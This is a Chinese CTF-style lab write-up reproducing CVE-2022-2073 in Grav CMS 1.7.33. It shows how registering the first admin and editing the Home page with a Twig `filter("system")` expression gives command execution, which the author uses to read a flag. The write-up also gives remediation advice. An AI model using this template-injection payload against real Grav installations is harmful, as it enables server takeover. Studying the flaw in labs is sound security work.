当前位置: 首页 > news >正文

春秋云镜靶场漏洞复现:CVE-2022-2073 Grav CMS Twig `system` 过滤器 RCE

环境:春秋云境“免费空间”授权实验靶场。历史实例已关闭。

1. 基本信息

项目 内容
CVE CVE-2022-2073
产品 Grav CMS 1.7.33
利用链 注册首个管理员 -> 编辑 Home 页面 -> Twig filter("system")
命令 cat /flag
Flag flag{80063410-3da9-4f8f-a351-c1ba153cc485}

2. 原理与复现

初始化状态下可注册首个管理员。后台页面编辑器允许 Twig 模板使用危险 system 过滤器,攻击者将命令作为模板表达式执行。

登录后台后编辑 Home 页面,加入等价模板表达式:

{{ 'cat /flag'|filter("system") }}

保存并访问 Home 页面:

注册管理员 -> 后台编辑 Home -> 保存 Twig -> GET / -> 执行命令 -> 回显 Flag

响应得到:

flag{80063410-3da9-4f8f-a351-c1ba153cc485}

3. 修复建议与验证

升级 Grav,禁用模板中的系统调用和危险过滤器;编辑权限最小化,模板与内容分离,进程使用低权限。Flag 与平台记录一致,已提交并关闭靶场。原始注册/后台路径和响应未保存,截图已保存到 images 目录并由平台详情页复核。

截图证据

题目详情与已攻克状态

题目状态与 Flag 验证区域

http://www.jsqmd.com/news/1400993/

相关文章:

  • 人生代码 | 第4关:输入要节制 -- 节奏失控,努力白忙
  • YOLOv8 八类人脸表情识别全栈工程|8038 张 VOC/YOLO 数据集、PyQt5 精美 GUI、ONNX 量化推理、全套训练评估曲线落地
  • 基于 Spring Boot + Vue3 的校园管理系统
  • Python字符串操作全解析:从基础增删改查到高效编程实践
  • LVS负载均衡彻底搞懂:三种工作模式原理与DR模式实战踩坑全记录
  • 阿里云Elasticsearch 9.4 Agent Builder:构建智能体,重塑搜索驱动型应用开发
  • 破解物理AI技术困局(33):TVA达成意图预判与主动配合
  • Token钱包下载APP代码开发流程
  • YOLOv8 飞鸟智能预警全栈工程|单类别 VOC/YOLO 航拍数据集、PyQt5 精美 GUI、ONNX 量化推理、全套训练评估曲线落地
  • 蓝速科技可移动多媒体智慧讲台:分散场地下的灵活选型实测
  • Spring Boot WebClient 从入门到精通:非阻塞HTTP客户端实战指南
  • Kimi LeetCode 3910. 统计节点和为偶数的连通子图 Java实现
  • 随手拍也能变成杂志大片:最近值得玩的 9 个照片处理 Skill
  • 【寄电瓶车到外省哪个物流便宜?2026价格对比与推荐,看完不再踩坑】 - 快递物流资讯
  • 换模小车,工厂注塑压铸模具移位简易高效设备 - 优企甄选
  • 春秋云镜靶场漏洞复现:CVE-2022-1014 WP Contacts Manager 未认证 SQL 注入
  • 第5章,[Win32 章节] :边框绘制函数(四)
  • HTX火币钱包官方网站代码全流程
  • 还在为Wand专业版续费?试试这款开源增强器,解锁Pro还送手机遥控
  • 构建可控AI Agent:从ReAct架构到安全实践
  • 小帅VXhook框架
  • Hydro SPJ 配置:告别答案唯一!
  • 春秋云镜靶场漏洞复现:CVE-2022-0948 Order Listener for WooCommerce REST SQL 注入
  • DBeaver数据库管理工具:一站式跨数据库连接与SQL编辑实战指南
  • 朝闻通品牌传播有哪些优势?全域媒体资源与全链条服务详解
  • 从Kimi暂停订阅看AI大模型推理的算力瓶颈与优化策略
  • 液压夹具工业应用,成型机床精准夹紧固定设备解析 - 优企甄选
  • 从“十佳班级”到“最好的我们”:班级建设的系统化实践与深度复盘
  • HoRain云--Codex CLI 配置
  • AI研发框架重构Git工作流:提升67%代码审查效率